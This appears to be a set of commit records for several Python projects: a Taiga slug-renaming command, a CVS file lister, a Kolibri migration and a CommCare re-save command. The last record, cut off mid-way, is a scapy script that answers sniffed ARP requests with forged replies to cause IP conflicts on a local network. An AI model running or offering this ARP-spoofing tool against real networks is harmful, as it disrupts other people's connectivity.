from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
    help = 'Change the project slug to a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
Create command to change project slug
|
[Backport] Create command to change project slug
|
Python
|
agpl-3.0
|
xdevelsistemas/taiga-back-community,dayatz/taiga-back,xdevelsistemas/taiga-back-community,dayatz/taiga-back,taigaio/taiga-back,taigaio/taiga-back,dayatz/taiga-back,taigaio/taiga-back,xdevelsistemas/taiga-back-community
|
[Backport] Create command to change project slug
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
    help = 'Change the project slug to a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
<commit_before><commit_msg>[Backport] Create command to change project slug<commit_after>
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
    help = 'Change the project slug to a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
[Backport] Create command to change project slug# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
    help = 'Change the project slug to a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
<commit_before><commit_msg>[Backport] Create command to change project slug<commit_after># -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
    help = 'Change the project slug to a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
|
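The safety check above hinges on slugify_uniquely: the command only proceeds when the requested slug comes back unchanged, meaning nothing else already owns it. A plausible sketch of that style of helper — slugify, then append a counter until the name is free — written against a generic exists() callback rather than taiga's actual implementation:

import re

def slugify(text):
    text = re.sub(r'[^\w\s-]', '', text.lower()).strip()
    return re.sub(r'[-\s]+', '-', text)

def slugify_uniquely(value, exists):
    # Return a slug derived from value that exists() reports as free.
    base = slug = slugify(value)
    i = 0
    while exists(slug):
        i += 1
        slug = '%s-%d' % (base, i)
    return slug

taken = {'my-project', 'my-project-1'}
print(slugify_uniquely('My Project!', taken.__contains__))  # -> my-project-2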
73c4c6fb87f33dadd9220e2ebca3ed5d275be47d
|
Tools/scripts/cvsfiles.py
|
Tools/scripts/cvsfiles.py
|
#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
Print a list of files under CVS.
|
Print a list of files under CVS.
|
Python
|
mit
|
sk-/python2.7-type-annotator,sk-/python2.7-type-annotator,sk-/python2.7-type-annotator
|
Print a list of files under CVS.
|
#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
<commit_before><commit_msg>Print a list of files under CVS.<commit_after>
|
#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
Print a list of files under CVS.#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
<commit_before><commit_msg>Print a list of files under CVS.<commit_after>#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
|
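Each line of a CVS/Entries file is slash-delimited (/name/revision/timestamp/options/tagdate); file entries start with an empty field, which is why the script keeps lines whose first '/'-split word is empty, while directory entries beginning with D fall through. A Python 3 sketch of the same traversal built on os.walk (behaviour-equivalent, not a drop-in for the 2.x script above):

import os

def cvs_files(root='.'):
    for dirpath, dirnames, _ in os.walk(root):
        if 'CVS' not in dirnames:
            continue
        dirnames.remove('CVS')   # do not descend into the CVS/ dir itself
        entries = os.path.join(dirpath, 'CVS', 'Entries')
        with open(entries) as fh:
            for line in fh:
                words = line.split('/')
                if words[0] == '' and words[1:]:
                    yield os.path.join(dirpath, words[1])

for path in cvs_files('.'):
    print(path)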
7d65295224fbeb61ae4116e67ab8f2b704112480
|
kolibri/auth/migrations/0003_classroom_facility_learnergroup.py
|
kolibri/auth/migrations/0003_classroom_facility_learnergroup.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
Create Collection proxy model migration
|
Create Collection proxy model migration
|
Python
|
mit
|
jtamiace/kolibri,indirectlylit/kolibri,benjaoming/kolibri,66eli77/kolibri,mrpau/kolibri,christianmemije/kolibri,benjaoming/kolibri,rtibbles/kolibri,mrpau/kolibri,aronasorman/kolibri,66eli77/kolibri,benjaoming/kolibri,indirectlylit/kolibri,aronasorman/kolibri,jayoshih/kolibri,christianmemije/kolibri,indirectlylit/kolibri,jtamiace/kolibri,ralphiee22/kolibri,lyw07/kolibri,jamalex/kolibri,rtibbles/kolibri,rtibbles/kolibri,mrpau/kolibri,MingDai/kolibri,christianmemije/kolibri,jayoshih/kolibri,aronasorman/kolibri,jayoshih/kolibri,ralphiee22/kolibri,66eli77/kolibri,whitzhu/kolibri,learningequality/kolibri,ralphiee22/kolibri,whitzhu/kolibri,lyw07/kolibri,jtamiace/kolibri,jonboiser/kolibri,jonboiser/kolibri,jayoshih/kolibri,learningequality/kolibri,lyw07/kolibri,whitzhu/kolibri,DXCanas/kolibri,MingDai/kolibri,lyw07/kolibri,christianmemije/kolibri,MCGallaspy/kolibri,MCGallaspy/kolibri,DXCanas/kolibri,MingDai/kolibri,jamalex/kolibri,MCGallaspy/kolibri,benjaoming/kolibri,DXCanas/kolibri,jtamiace/kolibri,rtibbles/kolibri,learningequality/kolibri,aronasorman/kolibri,jonboiser/kolibri,jamalex/kolibri,whitzhu/kolibri,jamalex/kolibri,mrpau/kolibri,66eli77/kolibri,ralphiee22/kolibri,learningequality/kolibri,MingDai/kolibri,jonboiser/kolibri,indirectlylit/kolibri,DXCanas/kolibri
|
Create Collection proxy model migration
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
<commit_before><commit_msg>Create Collection proxy model migration<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
Create Collection proxy model migration# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
<commit_before><commit_msg>Create Collection proxy model migration<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
|
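Django proxy models reuse the parent's database table and add only Python-level behaviour, which is why the generated migration declares no fields and just records 'proxy': True with bases pointing at the concrete kolibriauth.collection model. A minimal sketch of model definitions that would produce this kind of migration (Collection is simplified here):

from django.db import models

class Collection(models.Model):
    name = models.CharField(max_length=100)

class Facility(Collection):
    class Meta:
        proxy = True   # same table as Collection, no new columns

class Classroom(Collection):
    class Meta:
        proxy = True

class LearnerGroup(Collection):
    class Meta:
        proxy = True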
ebc708440cdf2ed46863cbe4ed595e2689f8fe71
|
corehq/apps/groups/management/commands/touch_group_docs.py
|
corehq/apps/groups/management/commands/touch_group_docs.py
|
from django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
Add management command to touch all group docs
|
Add management command to touch all group docs
|
Python
|
bsd-3-clause
|
dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,SEL-Columbia/commcare-hq,SEL-Columbia/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,dimagi/commcare-hq,qedsoftware/commcare-hq,puttarajubr/commcare-hq,puttarajubr/commcare-hq,qedsoftware/commcare-hq,puttarajubr/commcare-hq,puttarajubr/commcare-hq,qedsoftware/commcare-hq,SEL-Columbia/commcare-hq,dimagi/commcare-hq
|
Add management command to touch all group docs
|
from django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
<commit_before><commit_msg>Add management command to touch all group docs<commit_after>
|
from django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
Add management command to touch all group docsfrom django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
<commit_before><commit_msg>Add management command to touch all group docs<commit_after>from django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
|
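The command stays memory-safe because iter_docs streams documents lazily and chunked() groups that stream into fixed-size batches, so each bulk_save touches at most CHUNK_SIZE wrapped docs. A sketch of such a chunker built on itertools.islice (illustrative, not dimagi's exact implementation):

from itertools import islice

def chunked(iterable, n):
    # Yield successive lists of up to n items from any iterable.
    it = iter(iterable)
    while True:
        chunk = list(islice(it, n))
        if not chunk:
            return
        yield chunk

for batch in chunked(range(7), 3):
    print(batch)   # [0, 1, 2] then [3, 4, 5] then [6]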
7428906683d179de61537f68d63e7b44438d687d
|
network_conflict_creator.py
|
network_conflict_creator.py
|
#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='Network conflict creator script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for sniffing ARP requests')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
Add network conflict creator script.
|
Add network conflict creator script.
|
Python
|
mit
|
Vladimir-Ivanov-Git/raw-packet,Vladimir-Ivanov-Git/raw-packet
|
Add network conflict creator script.
|
#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='Network conflict creator script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for sniffing ARP requests')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
<commit_before><commit_msg>Add network conflict creator script.<commit_after>
|
#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='Network conflict creator script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for sniffing ARP requests')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
Add network conflict creator script.#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='Network conflict creator script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for sniffing ARP requests')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
